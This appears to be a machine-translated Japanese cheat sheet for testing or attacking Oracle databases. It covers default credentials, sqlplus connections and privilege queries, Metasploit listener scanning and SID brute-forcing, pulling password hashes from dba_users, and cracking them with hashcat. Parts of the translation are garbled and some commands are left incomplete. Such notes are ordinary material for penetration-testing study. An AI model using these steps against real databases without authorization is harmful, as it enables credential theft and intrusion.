[Oracle]必須知識ポイント


デフォルトのアカウント
  • デフォルト利用可能口座sys:change_on_installデータベース管理タスク実行system:managerデータベース管理タスク実行dbsnmp:dbsnmpデータベース関連パフォーマンスの監視および管理に使用されるユーザーsysman:sysman EM管理に使用されるユーザーsqlplusを使用して接続を確立します.パスワードはchange_に記入してください.on_install as sysdba等
  • デフォルトロックアカウントscott:tigerユーザーCONNECTおよびRESOURCEデータベースロール
  • を含む
    パスワードの変更とロック解除
    SQL> alter user scott identified by mypassword;
    
    SQL> alter user scott account unlock;
    

    詳細については、「システムデフォルトORACLEユーザーおよびパスワード」を参照してください.
    SQLPlus接続
    システム認証によるローカル接続の確立
    OS認証は、データベース・サーバがlistenerを起動する必要もなく、データベース・サーバが使用可能な状態にある必要もありません.たとえば、データベースを起動するには、sqlplusにアクセスし、startupコマンドで起動します.
    sqlplus /nolog
    SQL> connect / as sysdba
    

    ユーザー名パスワードによるローカル接続の確立
    ネイティブ・データベースに接続し、データベース・サーバがlistenerを起動する必要はありませんが、データベース・サーバが使用可能な状態である必要があります.
    sqlplus user/pass
    sqlplus sys/change_on_install as sysdba
    

    リモートネットワーク接続の確立
    リモート・ネットワーク接続の一般的な方法では、データベース・サーバがlistenerを起動し、使用可能な状態にある必要があります.
    sqlplus user/pass@//ip:port/sid
    eg: 
    sqlplus sys/change_on_install@//192.168.10.12:1521/orcl as sysdba
    sqlplus scott/tiger@//192.168.10.12:1521/orcl
    
    

    クエリー権限コマンド
    ユーザー、権限、ロールの問合せ
  • 現在のユーザーshow userを表示します.
  • すべてのユーザーを表示:select*from dba_users; select * from all_users; select * from user_users;
  • ユーザーシステム権限の表示:select*from dba_sys_privs; select * from session_privs; select * from user_sys_privs;
  • ユーザー・オブジェクトの表示権限:select*from dba_tab_privs; select * from all_tab_privs; select * from user_tab_privs;
  • すべてのロールを表示:select*from dba_roles;
  • ユーザーが所有するロールの表示:select*from dba_role_privs; select * from user_role_privs;
  • 以上のコマンドの更なる解釈DBA_SYS_PRIVS:あるユーザが持っているシステム権限USERを問い合わせるSYS_PRIVS:現在のユーザが持つシステム権限SESSIONを問い合わせるPRIVS:現在のユーザが所有しているすべての権限を問い合わせるROLE_SYS_PRIVS:あるロールが持つシステム権限を問い合わせる注意:SYSユーザーでこのビューを問い合わせるには、そうでなければ空に戻ります.ROLE_ROLE_PRIVS:現在のキャラクタに付与されたキャラクタSESSION_ROLES:現在のユーザーがアクティブになっている役割USER_ROLE_PRIVS:現在のユーザに付与されているロール
  • 弱いパスワードプローブ
    サーバ検出
    msf > use auxiliary/scanner/oracle/tnslsnr_version
    msf auxiliary(scanner/oracle/tnslsnr_version) > set RHOSTS 192.168.10.0/24
    msf auxiliary(scanner/oracle/tnslsnr_version) > set THREADS 5
    msf auxiliary(scanner/oracle/tnslsnr_version) > run
    

    SIDを解読する
    // oracle v9.2.0.8 -
    msf > use auxiliary/scanner/oracle/sid_enum
    // oracle v9.2.0.8 +
    msf > use auxiliary/admin/oracle/sid_brute
    msf > use auxiliary/scanner/oracle/sid_brute
    
    

    弱いパスワードプローブ
  • metesploitはoracleクライアントをインストールし、ruby-oci 8をインストールする必要があります.
  • msf > use 
    
  • hydraはOPTオプションが必要なため、ネット上の情報は非常に少なく、駆動サポートも必要らしい.
  • root@kali# hydra 
    

    データベースパスワードの解読
  • DBAユーザを取得し、暗号化パスワードは既存のDBAユーザを利用してデータベースに接続し、以下のコマンドを実行する.
  • SQL> select username,password from dba_users;
    USERNAME           PASSWORD
    ------------------ --------------------
    SYS                D4C5016086B2DC6A
    SYSTEM             D4DF7931AB130E37
    ...
    
  • 暴力解読暗号化パスワードhashcat暴力解読暗号化パスワードを利用する.
  • [ Hash modes ]
    3100   Oracle H: Type(7+)
    112    Oracle S: Type(11+)
    12300  Oracle T: Type(12+)
    
    root@kali# hashcat -a 3 -m 3100 -o cracked.log hash.list ?l?l?l?l?l --remove --force
    
    
    

    システム権限